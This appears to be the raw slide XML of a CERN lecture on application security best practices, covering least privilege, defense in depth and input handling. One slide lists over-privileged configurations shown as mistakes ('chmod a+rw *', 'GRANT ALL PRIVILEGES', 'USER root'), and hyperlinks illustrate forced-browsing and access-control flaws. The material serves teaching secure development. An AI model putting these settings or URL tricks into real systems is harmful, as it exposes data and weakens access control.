          <a:ext cx="2235848" cy="223584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Least privilege principle</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3552610" y="437853"/>
        <a:ext cx="1639622" cy="1006131"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9FE80FC2-4B98-314E-BA67-F7E1C068A021}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4061265" y="1443985"/>
          <a:ext cx="2235848" cy="223584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Complexity kills security</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4745062" y="2021579"/>
        <a:ext cx="1341509" cy="1229716"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F4085A85-2B95-D546-96BA-C1196B30EDD8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2447728" y="1443985"/>
          <a:ext cx="2235848" cy="223584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Defense </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0"/>
            <a:t>in depth</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2658271" y="2021579"/>
        <a:ext cx="1341509" cy="12297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8AB25F-DD6E-4F2F-898A-55622403BD7D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="3119596" cy="75597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1" kern="1200" dirty="0"/>
            <a:t>User input</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22142" y="22142"/>
        <a:ext cx="3075312" cy="711688"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{512D843D-FFA6-448A-933F-933AD3CB21F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="1180477" y="774871"/>
          <a:ext cx="283489" cy="340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 rot="-5400000">
        <a:off x="1220166" y="803220"/>
        <a:ext cx="204113" cy="198442"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{60FA2900-388A-4767-8E60-665FB1229F33}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1133958"/>
          <a:ext cx="3119596" cy="755972"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="2340760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1" kern="1200" dirty="0"/>
            <a:t>Server-side code</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22142" y="1156100"/>
        <a:ext cx="3075312" cy="711688"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D0E539FA-5CCD-48B6-88D8-024364E357BE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="1180477" y="1908830"/>
          <a:ext cx="283489" cy="3401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681520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500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1220166" y="1937179"/>
        <a:ext cx="204113" cy="198442"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DECCAB2B-7502-405B-A60C-6BD6EE0BFE3B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2267917"/>
          <a:ext cx="3119596" cy="755972"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="4681520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1" kern="1200" dirty="0"/>
            <a:t>Backend systems </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-GB" sz="1500" b="1" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-GB" sz="1500" kern="1200" dirty="0"/>
            <a:t>(database, command-line etc.)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22142" y="2290059"/>
        <a:ext cx="3075312" cy="711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84B42-78D7-4A2F-893A-69569475D6B4}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>06/11/2024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C6E26-FEC2-4DFE-8CAD-1F552704DB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2354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9838C82-E9C4-4A05-A085-94C856BD6EF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8899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ch/whitehat-examples/cal.php" TargetMode="External"/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18741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3361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From https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fontawesome.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/icons/categories/security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2556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Less is more (e.g. less installed packages)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simplicity is key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2065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12565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18595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632C1A-BE59-2B33-D8BF-49CD434D1E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6AA979-F29D-F774-D4D4-80563BE6C0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F06AE2-CF52-56FC-05DE-B89051DBEC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5A7BB9-4DB9-2484-8410-17644C5FFB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20934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451939-2C90-3D3F-9B99-EA85BC238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318031C-CC73-F5D6-A47C-CAD0C9DF5E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72506B-D155-7BA5-A8BA-F9CCDF6E87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191678-C998-1144-7FD8-89C3E47B20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8466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Credits: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CH"/>
              <a:t>ser-graduate, user-secret and user-lock icons: CC-A 4.0 by Font Awesome </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fontawesome.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/license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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fontawesome.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/icons/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user-lock?f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>classic&amp;s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>solid&amp;pc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=%23000000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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fontawesome.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/icons/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user-graduate?f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>classic&amp;s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>solid&amp;pc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=%23000000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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fontawesome.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/icons/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user-secret?f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>classic&amp;s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>solid&amp;pc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=%23000000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72243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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cern.ch/whitehat-examples/cal.php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838C82-E9C4-4A05-A085-94C856BD6EF3}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr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0031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167594"/>
            <a:ext cx="7772400" cy="1426555"/>
          </a:xfrm>
        </p:spPr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31486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fr-CH" dirty="0"/>
              <a:t>Cliquez pour modifier le style des sous-titres du masque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Application security – CSC on IT Services 2024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4CEF3-0E61-48B5-9F19-C0A65678DA8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358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Application security – CSC on IT Services 2024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56454-9167-4CFA-BF49-6C2EB5D0FCF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813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Application security – CSC on IT Services 2024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FCD81-8B2A-480D-B669-A4A1D1FE1E2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3944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357505"/>
            <a:ext cx="8744843" cy="486128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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059582"/>
            <a:ext cx="8744843" cy="3726414"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle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520" y="4785996"/>
            <a:ext cx="5768280" cy="255110"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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1419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520" y="4785995"/>
            <a:ext cx="5768280" cy="255111"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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Sebastian Lopienski – Application security – CSC on IT Services 2024</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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BF147916-B63C-4415-8AE0-20995E1305E4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39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357505"/>
            <a:ext cx="8744843" cy="486128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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1520" y="1221600"/>
            <a:ext cx="4320480" cy="3564396"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1950"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1725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21600"/>
            <a:ext cx="4316288" cy="3564396"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1950"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1725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520" y="4785996"/>
            <a:ext cx="5696272" cy="270030"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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Sebastian Lopienski – Application security – CSC on IT Services 2024</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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i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>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E8073BDF-7870-40B8-9744-0FB5F14AF90C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6753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357505"/>
            <a:ext cx="8744843" cy="486128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH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83618"/>
            <a:ext cx="4040188" cy="247538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  <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>Deuxième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>Troisième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>Quatrième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty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383618"/>
            <a:ext cx="4041775" cy="247538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CH" dirty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Application security – CSC on IT Services 2024</a:t>
            </a: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677F-74BB-44A1-A78C-E164C755B5ED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28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Application security – CSC on IT Services 2024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D2952-C8CA-4298-9C05-0B0548194CF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8278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Application security – CSC on IT Services 2024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08F7D-CC7C-4172-BE2D-29DF22FF424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1136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Application security – CSC on IT Services 2024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69542-5DF4-4984-8DFE-CF610591BDB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7248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Sebastian Lopienski – Application security – CSC on IT Services 2024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6583C-83B7-48C7-A14F-8540A156A44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604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627460"/>
            <a:ext cx="8744843" cy="486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520" y="1221600"/>
            <a:ext cx="8744843" cy="3564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 dirty="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 dirty="0" smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sebastian Lopienski – Application security – CSC on IT Services 2024</a:t>
            </a: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91931"/>
            <a:ext cx="2443163" cy="26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 smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A799BC38-B1E0-46CB-93C7-62D565B48AD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>
              <a:lumMod val="65000"/>
              <a:lumOff val="35000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
          <a:cs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  <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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195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1725">
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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tx1">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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ea typeface="ＭＳ Ｐゴシック" charset="-128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41237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www.owasp.org/index.php/Category:OWASP_Top_Ten_Project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corp.com/internal/salaries.xls" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://site.com/admin/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://site.com/.gi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hop.com/cart?id=123456" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://shop.com/cart?id=413246" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://site.com/admin/adduser?name=X" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://me.net/No/One/Will/Guess/82534/me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security.web.cern.ch/services/en/whitehats.shtml" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.schneier.com/blog/archives/2008/03/the_security_mi_1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docs.gitlab.com/ee/user/application_security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docs.gitlab.com/ee/user/application_security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itlab.com/ee/user/application_security/sast/#supported-languages-and-frameworks" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.gitlab.com/ee/user/application_security/sas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semgrep/semgrep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.imgur.com/rGtgr.jpg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.imgur.com/rGtgr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7A0EBDB-AE07-344E-A580-262E9566EF67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4731990"/>
            <a:ext cx="9144000" cy="411510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0A076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569131"/>
            <a:ext cx="7920880" cy="1426555"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>(Short introduction to best practices </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>for secure development, testing and deployment)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="14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456817"/>
            <a:ext cx="9143999" cy="1627101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sz="1800" b="1" dirty="0"/>
              <a:t>Sebastian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Łopieński</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CERN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB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GB" sz="2000" i="1" dirty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CERN School of Computing on IT Services</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="20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GB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November 2024</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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7FF586-EF73-E14A-830E-365C4F31BA9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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solidFill>
            <a:srgbClr val="0A076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6250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A775A-32C5-56D5-EF62-04E1C71D9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50"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Least privilege principle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A42B66-C59C-A688-4859-D06868BEB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7CC886-E18D-130D-6C7C-C32545264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10</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-F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67F372-3E63-1989-45FF-0F5B1F799FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1932849" y="1131590"/>
            <a:ext cx="5910592" cy="1015663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i="1" dirty="0"/>
              <a:t>“Every program and every user of the system </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>should operate using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>least amount of privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>necessary to complete the job.”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6C22045-4D5E-3C50-3207-2A440DE13E3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465217" y="2499742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Forget any of the following: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EEEB028-0770-1CAA-2DA6-1FD0D3E610F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="3061130"/>
            <a:ext cx="1701107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ndale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -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D8432C8-6306-4B71-94E4-F3068EF07B80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3814874" y="2587664"/>
            <a:ext cx="1425390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ndale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>USER root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1660608-B1F3-714F-A825-EA39043E0B47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363275" y="4304157"/>
            <a:ext cx="7077579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ndale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GRANT ALL PRIVILEGES ON database.* TO 'user'@'%';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2CAA8D0-1F78-FC51-1841-AFA92AD80118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441095" y="3642578"/>
            <a:ext cx="2114681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ndale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allowed = True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970D87-EABA-AADF-86FF-3321965BF326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2771800" y="3219822"/>
            <a:ext cx="1838965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>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a+rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *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71561BF-4531-2F22-7DA6-E2F4E1E2A129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5926609" y="2847533"/>
            <a:ext cx="2390398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ndale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -u admin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A9BB46B-31B4-0312-165B-DEA57B9B4689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076056" y="3322180"/>
            <a:ext cx="1701107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ndale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>accept: all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05D955C-FFDB-6849-E101-4B4563C7D9F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639830" y="2329895"/>
            <a:ext cx="3079689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ndale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set Visibility=public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CDEC4A-9196-605D-768A-75453385AAF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2859261" y="3796244"/>
            <a:ext cx="5561138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>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jdbc:postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://…/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>database?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4231515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F1E91-107A-4D03-69C8-5F1B3B5BD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50"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defense in depth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(multiple layers of defense)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156C9F-E303-CCC5-B15E-494F1E1C5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2BF47E-1BE6-0D1C-2F0C-516393FFC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11</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="fortress-beaumaris">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90E4B726-609D-0933-6308-54E0CAD142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616" y="1053647"/>
            <a:ext cx="3867433" cy="306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Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FC46D06-A547-50E6-1C73-E8259C36CF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696" y="4303912"/>
            <a:ext cx="1196439" cy="316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2209" tIns="31105" rIns="62209" bIns="31105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50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XIII century</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 10" descr="E:\Local\2010.06 Sec Day\securing\img\Defense in depth_2.jpg">
            <a:extLst>
